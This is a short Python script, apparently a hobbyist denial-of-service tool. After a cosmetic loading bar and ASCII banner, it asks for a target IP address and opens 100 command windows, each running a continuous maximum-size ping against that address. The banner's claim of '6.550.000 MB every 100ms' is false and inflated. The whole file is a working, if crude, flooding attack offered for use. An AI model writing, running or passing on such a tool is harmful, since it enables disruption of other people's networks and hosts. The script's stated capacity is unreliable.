import os, time from colorama import Fore, Back, Style, init import subprocess init() os.system("cls") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading []") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [=]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [==]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [===]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [====]") time.sleep(1) print(Fore.RED + Fore.YELLOW + "Loading [=====]") time.sleep(2) print(Fore.RED + Fore.YELLOW + "Loading [======]") time.sleep(2) print(Fore.RED + Fore.YELLOW + "Loading [=======]") time.sleep(2) print(Fore.RED + Fore.YELLOW + "Loading [========]") time.sleep(2) print(Fore.RED + Fore.YELLOW + "Loading [=========]") time.sleep(2) print(Fore.RED + Fore.YELLOW + "Loading [==========]") time.sleep(2) print(Fore.GREEN + "Loaded!") time.sleep(1) os.system("cls") title = """ ______ _ __ __ /_ __/___ _(_)___ _____ _/ /_ __ __/ /____ / / / __ `/ / __ `/ __ `/ __ \/ / / / __/ _ \ / / / /_/ / / /_/ / /_/ / /_/ / /_/ / /_/ __/ /_/ \__, /_/\__, /\__,_/_.___/\__, /\__/\___/ /____/ /____/ /____/ Ping a spefic ip with 6.550.000 MB every 100ms """ print(Fore.RED + Fore.YELLOW + title) print("_________________________________") ipinput = input(Fore.GREEN + "Put in ip: ") print(Fore.RED + Fore.YELLOW + "_________________________________") ip = ipinput bytess = "65500" for _ in range(100): subprocess.Popen(["start", "cmd", "/k", f"ping -l {bytess} {ip} -t"], shell=True) time.sleep(4)